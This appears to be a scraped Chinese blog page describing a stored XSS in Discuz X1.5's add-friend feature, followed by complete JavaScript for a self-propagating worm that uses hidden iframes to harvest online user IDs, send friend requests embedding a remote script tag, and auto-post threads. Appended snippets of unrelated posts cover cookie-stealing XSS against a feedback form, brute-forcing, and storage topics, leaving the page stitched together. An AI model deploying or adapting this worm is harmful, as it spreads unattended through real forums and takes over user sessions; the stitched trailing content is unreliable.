Discuz X1.5 利用添加好友处存储xss进行蠕虫worm扩散

Discuz X1.5 在添加好友的地方有处存储xss,借助此处xss跟用户交互可以进行蠕虫指数扩散。

位置在添加好友处

x完之后的效果

点击后触发

ok 借助此存储xss,我们进行worm传播,dz的会话cookie是被打伤http-only的,但是xss的效果是获取你当前域下的用户会话的权限。这不干扰我们worm的进行。

step 1 : attacker 发送带xss worm payload给 用户a,

step 2 : 用户A点击后,自身作为宿主去添加其他人为好友,并且附带攻击payload

step 3 : 被x的用户互相感染,成指数增长,为了验证,凡是被感染的用户都会被我们用js控制发一个帖子

没code说个jb,worm代码如下

你需要修改

1 urlBase 为你的想1.5 论坛基地址

2 存放xss的payload的地址

//code for xss test

//论坛的基地址
var urlBase = "http://forum.xxx.com";

var add= function(uid){

    var ifBox = window[‘ifBox‘] || (window[‘ifBox‘]={});

    var uyk = (new Date()).getTime();

    var ifFame = ifBox[uyk] =document.createElement("iframe");

    ifFame.src=urlBase + "/home.php?mod=spacecp&ac=friend&op=add&uid="+uid;

    ifFame.width=0;ifFame.height=0;

    ifFame.onload = function(){

        try{
//存放xss payload的地址
            ifFame.contentDocument.getElementsByName("note")[0].value= ‘hello<script src="http://xxx.xxx.xxx/js/dz.js"></script>‘;

            ifFame.contentDocument.getElementById("addsubmit_btn").click();

            ifFame=null;

        }catch(err){

        }

    }    

    document.body.appendChild(ifFame);

}

var newThread = function(){

    var if1 = document.createElement("iframe");

    if1.src= urlBase+"/forum.php?mod=post&action=newthread&fid=21";

    if1.width=0;if1.height=0;

    if1.onload = function(){

        var doc =if1.contentDocument;

        doc.getElementById("subject").value = "哇卡卡卡~~~";

        if1.contentDocument.getElementById("e_iframe").contentDocument.body.innerHTML =" _______________</br>< XSS Worm Test ></br> ---------------</br>        \   ^__^</br>         \  (oo)\_______</br>            (__)\       )\/\</br>                ||----w |</br>                ||     ||</br>";

        doc.getElementById("postsubmit").click();

        if1.onload = function(){return false;}

    }

    document.body.appendChild(if1);

}

var if0 = document.createElement("iframe");

if0.src= urlBase + "/forum.php?showoldetails=yes#online";

if0.width=0;if0.height=0;

if0.onload = function(){

    var uli =if0.contentDocument.getElementsByTagName("li");

    for(var i = 0;i<uli.length;i++){

        if(uli[i].title.length > 5){

            var uid = uli[i].childNodes[3].href.substring(uli[i].childNodes[3].href.indexOf("uid=")+4);

            var r = Math.round(Math.random() * 10);

           // if(i%10 == r){

                //轻点

                newThread();

                add(uid);

          //  }

        }

    }

}

document.body.appendChild(if0);

这里面又很多的坑包括js的异步加载,跨iframe的元素操作等等,希望对其他人能提供帮助。

实际的worm效果是,20分钟内刷了30页,每页20篇的论坛帖子把~~

时间: 2024-10-09 23:31:57

Discuz X1.5 利用添加好友处存储xss进行蠕虫worm扩散的相关文章

[ 中危 ] dp意见反馈处存储型XSS

XSS平台架设攻击代码,有很多,如我是在http://xss.fbisb.com上架设的. 在 xxx.dianping.com系统意见反馈处插入xss代码提交,而后等待后台管理员点击,可打到其COOKIE,出口IP和内网IP等.危害由原本的边缘,因为已经接触到内网,所以变为中危. RANK  12 == RMB 120 该漏洞的发现应该是源于对这种与后台交互的接口的敏感,和尝试. -913 原文地址:https://www.cnblogs.com/huim/p/8313356.html

91网漏洞打包#越权+爆破+存储xss可打cookie

漏洞一.主站存在登录口爆破 抓包,爆破一下 爆破成功 漏洞二.检测app时一处存储xss 在app登录后 我要提问那里插入xss 然后弹窗 可以打到cookie 漏洞三.app个人资料处平行越权可查看大量用户(用户id可以遍历出来) 点开个人资料  然后代理抓包 可以看到  包以get的形式请求了URL http://m.91taoke.com/index.php/user/12170145 然后访问看看 此处已经可以看到email了 只需要变动id就可以切换用户了 然后在数据包里遍历下来已经注

hbase 学习(十五)缓存机制以及可以利用SSD作为存储的BucketCache

下面介绍Hbase的缓存机制: a.HBase在读取时,会以Block为单位进行cache,用来提升读的性能 b.Block可以分类为DataBlock(默认大小64K,存储KV).BloomBlock(默认大小128K,存储BloomFilter数据).IndexBlock(默认大小128K,索引数据,用来加快Rowkey所在DataBlock的定位) c.对于一次随机读,Block的访问顺序为BloomBlock.IndexBlock.DataBlock,如果Region下面的StoreFi

手机数据恢复华为荣耀X1智能手机32G内置存储手机严重损坏恢复照片聊天记录文档

华为荣耀X1智能手机32G内置存储手机,Android OS 4.2 系统,接到手机的时候已经成以下这个样子了,屏幕严重粉碎,各种配件已经都七零八碎,万幸手机主板还在,对于安卓手机,目前我们只要能保证他的内置存储芯片没有出现物理损坏,我们都是可以完整的提取里面的数据的,像手机的照片,视频,微信聊天记录已经qq聊天记录,都是可以通过技术手段将底层的数据完整的提取出来,然后从新将各数据库分离移植到到新的设备上,聊天记录就可以从新呈现出来,由于手机内置存储卡采用了全面封胶的BGA封装方式,所以我们在将

利用HttpOnly来防御xss攻击

xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了... 如下js获取cookie信息: url=document.top.location.href; cookie=document.cookie; c=new Image(); c.src='http://www.******.com/c.php?c='+coo

利用手机中存储的电话号码给联系人打电话与发短信

1.将存储在数据库中的数据布局到手机界面上,其操作请见http://blog.csdn.net/xia09222826/article/details/28660653 2.三种效果显示出的效果分别是: 1)自定义的效果 2)单选的效果 3)多选的效果 3.点击某一个联系人进行拨打电话或者发送短信(以自定义的效果为例) 1)效果视图(比如点击了序号1的联系人):从手机电话备份界面跳转到PhoneandemailActitvity界面 2)程序实现 ①注册点击事件         lv_users

利用独立分区存储ceph的日志

一开始我采用的方法如下: ### Stop osd $ service ceph stop osd.0 ### Flush Journal $ ceph-osd --flush-journal -i 0 ### Create symlink to partition $ rm /var/lib/ceph/osd/ceph-0/journal $ ln -s /dev/sda2 /var/lib/ceph/osd/ceph-0/journal ### Create new journal $ ce

利用Application对象存储登录用户信息

Application对象非常适合用于存储一些与整个应用相关数据,例如应用版本,应用登录账户,数据缓存等. 如activity的切换是很频繁的,差不多可以和一个网站中不同网页之间的切换一样,那么不同的activity之间需要存储公共信息(如只有一个当前登录用户)以及数据传递等. 利用Application对象存储登录用户信息的方法,可以很方便的不同activity之间获取登录用户信息. 首先,新建一个java类继承Application类:BaseApplication.java import

利用Azure高级存储搭建高性能Linux服务器(1)

目前Azure针对虚拟机提供两种类型的存储,一种是标准存储,基于HDD的,一种是高性能存储Premium Storage(在下文中简称PS),基于SSD的.针对用户高性能,低延迟,I/O密集型的应用,比如数据库MySQL, MongoDB,SAP等提供良好的支持. 本文主要介绍如何在CentOS上使用高级存储构建数据库服务器的最佳实践,包括你的应用需求在超过单盘IOPS限制的情况下,如何通过使用软RAID来构建50000级别的IOPS服务器. 目前高级存储只能用于DS/GS/FS系列机器作为数据